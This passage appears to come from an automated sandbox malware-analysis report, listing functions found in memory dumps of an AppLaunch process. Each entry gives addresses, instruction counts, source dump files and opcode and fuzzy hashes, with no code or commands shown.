                                                                                                                                                                          • Instruction Fuzzy Hash: 5D316574C09248CFCB09CFE4D54A7EDBFB0BF0A201F1144AAD845A7292D7394A85DF61
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB3DE6 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e1db86a6903cb58ce1f5298f3d0e6b5c37e389028b193b3bac8a29699fa0cdeb
                                                                                                                                                                          • Instruction ID: 1a38c86e944b5562a6876424974034070e45f7bbdf985214253ec1fb3e70125c
                                                                                                                                                                          • Opcode Fuzzy Hash: e1db86a6903cb58ce1f5298f3d0e6b5c37e389028b193b3bac8a29699fa0cdeb
                                                                                                                                                                          • Instruction Fuzzy Hash: A4316F35B052048FDB04DF69D8989AEBBB1FF89320B1580AAE905DB3A1DB309C44CB61
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A3187F0 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f99dbb9aea661de98d2d415bccf81acebd9fc42d0108eadfd481b3535ee994f8
                                                                                                                                                                          • Instruction ID: 59d65474812af2c1dbca94b6eefce2207b093bce1e45bbe7052d541364daec8d
                                                                                                                                                                          • Opcode Fuzzy Hash: f99dbb9aea661de98d2d415bccf81acebd9fc42d0108eadfd481b3535ee994f8
                                                                                                                                                                          • Instruction Fuzzy Hash: F2312035D122189FDB09DFA4E4586EEBFB2FF4A305F50446AE411B3280CB795A84CFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 051BD150 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.356195144.00000000051BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051BD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_51bd000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3c4e449bfc96967a2e6cb71fe5be9c1be18848c4ca96a9e2445db89cfbab79d6
                                                                                                                                                                          • Instruction ID: c25ddd0b53584460d01c112324d7b906b8ba3518fb59d674c8177bf2cdbc7366
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c4e449bfc96967a2e6cb71fe5be9c1be18848c4ca96a9e2445db89cfbab79d6
                                                                                                                                                                          • Instruction Fuzzy Hash: DB213871504240DFEF19DF50E9C4F66BB66FB88314F2586A9E9054B206C376D812CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB0FB4 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6c0c037b4286cecd87a4d0de8939b30207723aa709d32191769969a53d3e539a
                                                                                                                                                                          • Instruction ID: e3b5dc3a328e239b53aa9fb8602ed010e74077488a8791c83fee4b7e5c9a0009
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c0c037b4286cecd87a4d0de8939b30207723aa709d32191769969a53d3e539a
                                                                                                                                                                          • Instruction Fuzzy Hash: 56212B317082449FDB00DB69D8509FABBB6EFC5720B5481AAE5158B3E2DBB0DC10C792
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 051BD654 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.356195144.00000000051BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051BD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_51bd000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0a9dee676e945efcfb7c97eee38bc3034f9b7d013ec07a72b4082e6a6a006f9c
                                                                                                                                                                          • Instruction ID: 68ee302fd0d8118ca612760e09af2719c74419dbca89b29516147c68b4cfe21f
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a9dee676e945efcfb7c97eee38bc3034f9b7d013ec07a72b4082e6a6a006f9c
                                                                                                                                                                          • Instruction Fuzzy Hash: 41216AB5504240DFEB18DF10E8C0FA6BF62FB88324F25C56DE9094B206C376D846CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 051BD740 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.356195144.00000000051BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051BD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_51bd000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 603c3acbd4095c4a19f573113d3dd5d3f4f367643b191285558e2c9334c4d0ec
                                                                                                                                                                          • Instruction ID: eb5786af5ab146321ac4a46198728e3c7b5152a17931a2ed11a709b9609460de
                                                                                                                                                                          • Opcode Fuzzy Hash: 603c3acbd4095c4a19f573113d3dd5d3f4f367643b191285558e2c9334c4d0ec
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C212B71504240DFEB19EF10E9C4FA6BF66FB88328F24C569D9054B206C375D855C7E1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A3187F8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d1799f4caea134e27e012929f6a0aabe873a2b4c9f7f4f99f921f204e1ecf81e
                                                                                                                                                                          • Instruction ID: d981e6c22eb4593b82b070b3ed3345a02155b2b33b85223847a729d409890e4d
                                                                                                                                                                          • Opcode Fuzzy Hash: d1799f4caea134e27e012929f6a0aabe873a2b4c9f7f4f99f921f204e1ecf81e
                                                                                                                                                                          • Instruction Fuzzy Hash: F6310C75D122189FCB08DFA4E4586EEBFB2FF49306F50446AE411B3280CB795A84CFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCF0D0 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 774f9a41e9e83b045fee418b0f63b78548317c16edbbd0f5d46cd218051cd017
                                                                                                                                                                          • Instruction ID: 38c39962041f31f7f9f22b732d8f8eafd41515fb0b046495d2f2b10748430ab8
                                                                                                                                                                          • Opcode Fuzzy Hash: 774f9a41e9e83b045fee418b0f63b78548317c16edbbd0f5d46cd218051cd017
                                                                                                                                                                          • Instruction Fuzzy Hash: EA11EE32B053166FCB169B78A8494BE7BFAEBC9224304847DE549C3301DE3A9C028B90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31B120 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7a491360a524611414c9b1e0e0d1c5b354fe0f548190e97937f999363568cc51
                                                                                                                                                                          • Instruction ID: d03b8e0aa921ed73724cbfd42c23ed84f0285469c96381f0ddf8ad5f91835664
                                                                                                                                                                          • Opcode Fuzzy Hash: 7a491360a524611414c9b1e0e0d1c5b354fe0f548190e97937f999363568cc51
                                                                                                                                                                          • Instruction Fuzzy Hash: 4811A27591D3988FCB1ACF64D8595DDFFB0AB8F210F0A41AAE081A7292D6641908CB61
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31B558 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2ab9589eb7b75c0704d64d526ba80dc6b3da861a290bd34330d03133d2b39fe5
                                                                                                                                                                          • Instruction ID: f5db413de0d6f5c56e39084bd9eac8beda4aca958a1c89ac5664a0b3eb50640c
                                                                                                                                                                          • Opcode Fuzzy Hash: 2ab9589eb7b75c0704d64d526ba80dc6b3da861a290bd34330d03133d2b39fe5
                                                                                                                                                                          • Instruction Fuzzy Hash: 4021FF76900218AFCB06CF94D944ED9BFB2FF4C310F0681A9E604AB231D732D961DB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A3198C0 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5cb04922ef1b1623a0f94297c2a944e47be18beea239714e414c332fee164fbd
                                                                                                                                                                          • Instruction ID: 0f7d1eb6eac8503f55d3c90a14799a09a7cf8fdaf2fce520f5fdd1bd4d95d5fd
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cb04922ef1b1623a0f94297c2a944e47be18beea239714e414c332fee164fbd
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D210FB1C15208DFCB09DFA4C5596EEBFF0BB49305F1084AAD015A7281EB794A84CF65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A3198D0 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 379c4fa62a576328f7b9b7e9b2aa77811cce6a9cfe0157d27ade576e4105b08a
                                                                                                                                                                          • Instruction ID: e58bd7e406015b73d5081a325c5ba51deb64e2ace40ea8a279223879ac9c78af
                                                                                                                                                                          • Opcode Fuzzy Hash: 379c4fa62a576328f7b9b7e9b2aa77811cce6a9cfe0157d27ade576e4105b08a
                                                                                                                                                                          • Instruction Fuzzy Hash: C621EAB0C11218DFCB08DFA4D5496EEBBF0BB09305F6084AAD415B3280DB394A84CFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A316110 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: cd8daf2173ee290071d564aa7a9d109550d79a84fae6b0a8c08780fc198580ff
                                                                                                                                                                          • Instruction ID: a224ac265bb847bb8e2d05da15b691ab47326b6627ad215deb104ae1f6ce1fcc
                                                                                                                                                                          • Opcode Fuzzy Hash: cd8daf2173ee290071d564aa7a9d109550d79a84fae6b0a8c08780fc198580ff
                                                                                                                                                                          • Instruction Fuzzy Hash: 2421DBB5C15218DFCB08DFA4D5496EEBBF0BF49305F6084AAD401B3280DB395A84DFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31B568 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6529316e03b5afa8fbe7e4b4985ebb32494d66864c5765d39860d9ec18764662
                                                                                                                                                                          • Instruction ID: f9b426a113b7bad68a74cf5f5ac6cee4a9edd84da3d327ebb810bd8abe4cf4d4
                                                                                                                                                                          • Opcode Fuzzy Hash: 6529316e03b5afa8fbe7e4b4985ebb32494d66864c5765d39860d9ec18764662
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B21AD76910118AFCB069F95D944ED9BFB6FF4C310F4681AAE604AB271C732D861EB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 051BD14B Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.356195144.00000000051BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051BD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_51bd000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 396b9bdd6e0428f74dbde32b868b9a689c294365cc8c62b96009346b7e5a0e0c
                                                                                                                                                                          • Instruction ID: 4651b6c0ace2866a4b69bd929522cafc3f6125d994b585220392ff8468947e75
                                                                                                                                                                          • Opcode Fuzzy Hash: 396b9bdd6e0428f74dbde32b868b9a689c294365cc8c62b96009346b7e5a0e0c
                                                                                                                                                                          • Instruction Fuzzy Hash: 1521A276404280DFDF06CF50E9C4B56BF72FB88314F28C6A9D9490B616C33AD456CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 051BD73B Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.356195144.00000000051BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051BD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_51bd000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2b01dbe77e2c3cd66bc07cf43a9009412fedb9933ae9a5b24d5daa3bf84f2184
                                                                                                                                                                          • Instruction ID: 54991aa4f046f738658503f86795f194917247b3af349e0e371b4788bb0bb192
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b01dbe77e2c3cd66bc07cf43a9009412fedb9933ae9a5b24d5daa3bf84f2184
                                                                                                                                                                          • Instruction Fuzzy Hash: F911E676804280CFDF16DF10D9C4B66BF72FB88324F28C6A9D8054B616C376D45ACBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 051BD64F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.356195144.00000000051BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051BD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_51bd000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2b01dbe77e2c3cd66bc07cf43a9009412fedb9933ae9a5b24d5daa3bf84f2184
                                                                                                                                                                          • Instruction ID: 6b413e6c709a5a38070fdc24b3a42854f950fb1527e7415b891249449ee1437d
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b01dbe77e2c3cd66bc07cf43a9009412fedb9933ae9a5b24d5daa3bf84f2184
                                                                                                                                                                          • Instruction Fuzzy Hash: E211D376404280CFDB15DF10E9C4BA6BF72FB88324F28C6A9D8454B656C336D456CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A319ED9 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2d13ede665a509dad5be6c0e3bc655c91b319d4623784cfe5ecc05c1bbe89f06
                                                                                                                                                                          • Instruction ID: bfae57001e4904fa6d0d15985d4daa14a34b1b7eb7422cfd3ae45bab3a5af182
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d13ede665a509dad5be6c0e3bc655c91b319d4623784cfe5ecc05c1bbe89f06
                                                                                                                                                                          • Instruction Fuzzy Hash: 05118B34E19118ABDF08CFA9E8986DDBFF5FB8D311F10916AE505B3240DB355905CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCF558 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d00e76c59c723176c0b7da09f04a117807a3b191ca0b454a6fd3b22581eb51b5
                                                                                                                                                                          • Instruction ID: 597ae5621af0058f6f685635a8ed82cede6b43251bb9c989f5f34fa069c20a33
                                                                                                                                                                          • Opcode Fuzzy Hash: d00e76c59c723176c0b7da09f04a117807a3b191ca0b454a6fd3b22581eb51b5
                                                                                                                                                                          • Instruction Fuzzy Hash: 48115771600208DFD725CF65E444BA67BA2FF85355F00806DF94A8F260CB32E941CB65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31B381 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4f0c0b1c950858a91f6c8ed2f95a116aa8555c6a213f005a4b3cdd48af866bea
                                                                                                                                                                          • Instruction ID: ef2c3c9f980e1e80308763eab03df7018cdfd0d9a55e5a39a10444df81bb68e0
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f0c0b1c950858a91f6c8ed2f95a116aa8555c6a213f005a4b3cdd48af866bea
                                                                                                                                                                          • Instruction Fuzzy Hash: 100184749042188BCF088FA9E9896ECFFF8EB8D311F009529E400B3340EB3008268FA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCFDBB Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3e81d802f82419881884ed6df5c3ab6ad61dac4624b0c5aefa99e32a83d5ca69
                                                                                                                                                                          • Instruction ID: dc668ecdf8770471753083f2d22debc92080e153de4419156378333cb2200f8e
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e81d802f82419881884ed6df5c3ab6ad61dac4624b0c5aefa99e32a83d5ca69
                                                                                                                                                                          • Instruction Fuzzy Hash: 8801DFB1B053806FC71A4F35A4509BBBBAA9FC6258714847ED48ACB762CF358C4ACB51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31ACDF Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8fef71302079d4f4fe268c96228abe05452cf1f5731c4b7b1e844c40c9c3edf5
                                                                                                                                                                          • Instruction ID: 6810215fb24baa678242579d3908f95598ebd5c9daa0084e88feb81135e6cffb
                                                                                                                                                                          • Opcode Fuzzy Hash: 8fef71302079d4f4fe268c96228abe05452cf1f5731c4b7b1e844c40c9c3edf5
                                                                                                                                                                          • Instruction Fuzzy Hash: F6014874D192189BCF08CFA9E8586EDBFF5EB8D351F11912AE805B3280DB3558458FA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 051BD041 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.356195144.00000000051BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051BD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_51bd000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2c42e74686d84e216bb9678ccdd6ed56b0fd6349da9fb6177f0e53233ea35e87
                                                                                                                                                                          • Instruction ID: 9dd16f6b3aa217770639d90878eb6382bc6a44f38c965a1bcf72359fe3ef2364
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c42e74686d84e216bb9678ccdd6ed56b0fd6349da9fb6177f0e53233ea35e87
                                                                                                                                                                          • Instruction Fuzzy Hash: D001F7715093449BF7288E26ECC4BA6BFA8FF41274F49811AED055F247C3B99841C7B2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A318760 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: eb8439e65e4d0eb037f1ff884ee061dc0c8ee3907a951887d6bbf66641ad896b
                                                                                                                                                                          • Instruction ID: 7ed32cc53bbf9b75a02d36b252ce95e0e407c87121e6aadafa70dd6764e1ef52
                                                                                                                                                                          • Opcode Fuzzy Hash: eb8439e65e4d0eb037f1ff884ee061dc0c8ee3907a951887d6bbf66641ad896b
                                                                                                                                                                          • Instruction Fuzzy Hash: F6018B34E041188BCF08CBA9E4186EDBFF5EB8D310F04916AE444B3240DB355805CB68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31B408 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
